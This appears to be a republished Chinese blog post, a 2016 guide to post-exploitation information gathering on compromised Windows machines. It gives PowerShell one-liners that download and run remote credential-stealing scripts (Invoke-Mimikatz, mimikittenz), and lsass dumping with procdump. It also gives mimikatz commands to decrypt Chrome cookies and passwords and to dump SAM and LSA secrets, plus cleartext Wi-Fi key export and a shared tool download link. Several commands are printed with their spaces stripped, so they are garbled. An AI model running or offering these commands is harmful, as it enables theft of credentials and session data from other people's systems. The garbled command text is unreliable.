后渗透攻防的信息收集

1.0前言

后渗透常见的信息收集思路

延伸:

  • 渗透测试中的技巧
  • 后渗透阶段的攻防对抗
  • linux入侵后续指南
  • mimikittenz:又一款Windows密码获取工具

1.1系统管理员密码

A.常用来获取windows密码的工具

1.mimikatz 2.wce 3.getpass 4.QuarksPwDump 5.reg-sam 6.pwdump7 7.procdump.exe +mimikatz …….

B.免杀抓取密码的两种方式

1

1.powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

tips:powershell 默认windows visa后才有

2. procdump lsass 进程导出技巧

12

C:\temp\procdump.exe-accepteula-malsass.exelsass.dmp//For 32 bitsC:\temp\procdump.exe-accepteula-64-malsass.exelsass.dmp//For 64 bits

然后本地使用mimikatz 还原密码

1.2 其他用户session、3389和ipc连接记录、各用户回收站信息收集

C.windows本地的信息收集、回收站的信息获取

cmdkey /list 查看3389可信任链接 使用netpass.exe 即可知道密码

net use 查看到已建立连接记录。也是直接可以用wmic at sc 等直接执行命令的

其中$I开头的文件保存的是路径信息,$R保存的是文件

1.3 浏览器密码和浏览器cookies的获取 ie chrome firefox 等

D1.chrome为例 的密码和cookies获取

12345678910

%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 %localappdata%\google\chrome\USERDA~1\default\USERDA~1 %localappdata%\google\chrome\USERDA~1\default\cookies chrome的用户信息保存在本地文件为sqlite 数据库格式

D2.mimikatz+WebBrowserPassView.exe获取浏览器的密码和cookie信息

123456

mimikatz读取chromecookiesmimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect"exit mimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1"exit mimikatz.exeprivilege::debuglog"dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1"exit//读chrome密码

1.4 windows无线密码获取。数据库密码获取

E.windows wifi密码的获取

netsh wlan show profiles 列出链接过的wifi

netsh wlan export profile interface=无线网络连接 key=clear folder=C:\ 读取指定无线网络的连接密码,以明文方式显示

1.5 host文件获取和dns缓存信息收集 等等

F.windows hosts/iis config

C:\Windows\System32\drivers\etc\hosts

windows7 windows2008等

C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS

windows2003位置

提权情况下或者过了uac的情况下直接type一下就行了

iis-web路径

12345

iis6 =========>cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/rootiis7 ,8 =======>appcmd.exe%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表 %systemroot%\system32\inetsrv\appcmd.exe list vdir ——列出网站物理路径

当然你也可以用mimikatz

12

mimiktaz读取iis7配置文件密码mimikatz.exeprivilege::debuglog"iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live"exit

1.6 杀软 补丁 进程 网络代理信息wpad信息。软件列表信息

G.ie浏览器的代理信息查看(网络代理信息wpad信息)

1

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

1.7 计划任务 账号密码策略与锁定策略 共享文件夹 web服务器配置文件

H.windows log view

1.Windows2003下默认存在eventquery.vbs

1

cscriptc:\WINDOWS\system32\eventquery.vbs/fi"Datetime eq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM"/lSecurity/V#查看SECURITY日志 2015-6.24 上午1点-上午10点日志

windows 7以上wevtutil 命令

2.查询所有登录、注销相关的日志语法

3.第三方信息收集工具LogParser.exe psloglist.exe等

1.8 vpn历史密码等 teamview密码等 启动项 iislog 等等

I.vpn密码获取为例

1

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

其他工具如Dialupass.exe

感兴趣可以看看mimikatz dpapi模块的使用。很强大 sam 密码 ipc连接密码

1.9 常用的后渗透信息收集工具。powershell+passrec的使用

J1.passrec intro

include:

vnc mail vpn router ie firefox chrome

J2.powshell intro

FTP访问、共享连接、putty连接 驱动、应用程序、hosts 文件、进程、无线网络记录

12

powershell"IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1'); Get-Information"

正则过滤进程密码,已测windows7

1

powershellIEX(New-ObjectSystem.Net.Webclient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1');Invoke-mimikittenz

sqlserver密码获取工具Get-MSSQLCredentialPasswords.psm1 //未测

结语

抛砖引玉!!!!!欢迎交流

下期:windows自带的后门维持工具

bitsadmin schtasks at wimc+mof等应用

tips:已360为例,绕过技巧

链接: http://pan.baidu.com/s/1o8NFSaI 密码: ypd8

原文发布于微信公众号 - 我为Net狂(dotNetCrazy)

原文发表时间:2016-08-31

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏程序员叨叨叨

听说你使用Android Studio遇到了一些小困惑

这个问题通常出现在Android Studio更新失败的时候,原因是download http://services.gradle.org/distributi...

12240
来自专栏生信技能树

Centos 下非 Root 安装 Microsoft R Open

Centos 下非 Root 安装 Microsoft R Open 作者: Hyacz hyacinth.hao@foxmail.com 2017年8月30...

540120
来自专栏技术之路

翻译qmake文档(一) qmake指南和概述

英文文档连接: http://qt-project.org/doc/qt-5/qmake-manual.html http://qt-project.org/d...

29070
来自专栏康怀帅的专栏

Fedora 常用软件

本文列举了 Fedora 常用软件。 右键菜单在终端中打开 $ yum -y install nautilus-open-terminal Tilix 原名 t...

47440
来自专栏编程坑太多

『高级篇』docker之Python开发信息服务(11)

PS:thrift的开发流程是: 先定义thrift的文件,然后通过命令生成对应的python代码。通过实现定义的thrift方法,来完成thrift的调用。

33930
来自专栏学习日志

【好文推荐】各种提权姿势总结

本文来自安全盒子,请点击原文链接查看原文。原文作者:黑色天使,如有版权问题请后台联系删除。

52000
来自专栏逸鹏说道

★Kali信息收集~4.DNS系列

★.1host:DNS信息 参数: ? 一般情况下,host查找的是A,AAAA,和MX的记录 ? 案例: DNS服务器查询 host -t ns 域名 ? ...

34180
来自专栏liulun

用Nim语言开发windows GUI图形界面程序

前言 本文得到了“樂師”的大力支持, 我们一起调试程序到深夜,要是没有他的帮忙, 我不知道要多久才能迈过这道坎, 另外“归心”还有其他人也提供了帮助, 他们都来...

44050
来自专栏施炯的IoT开发专栏

Memory Information on Windows Mobile(续)

    在《Memory Information on Windows Mobile》一文中,讲述了Windows Mobile 6 Professional ...

20650
来自专栏landv

php归档格式:phar文件详解(创建、使用、解包还原提取)

30640

扫码关注云+社区

领取腾讯云代金券